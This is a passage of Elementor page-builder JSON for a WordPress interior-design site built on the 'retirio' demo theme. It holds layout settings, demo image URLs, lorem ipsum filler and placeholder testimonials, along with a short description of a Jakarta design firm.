IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animat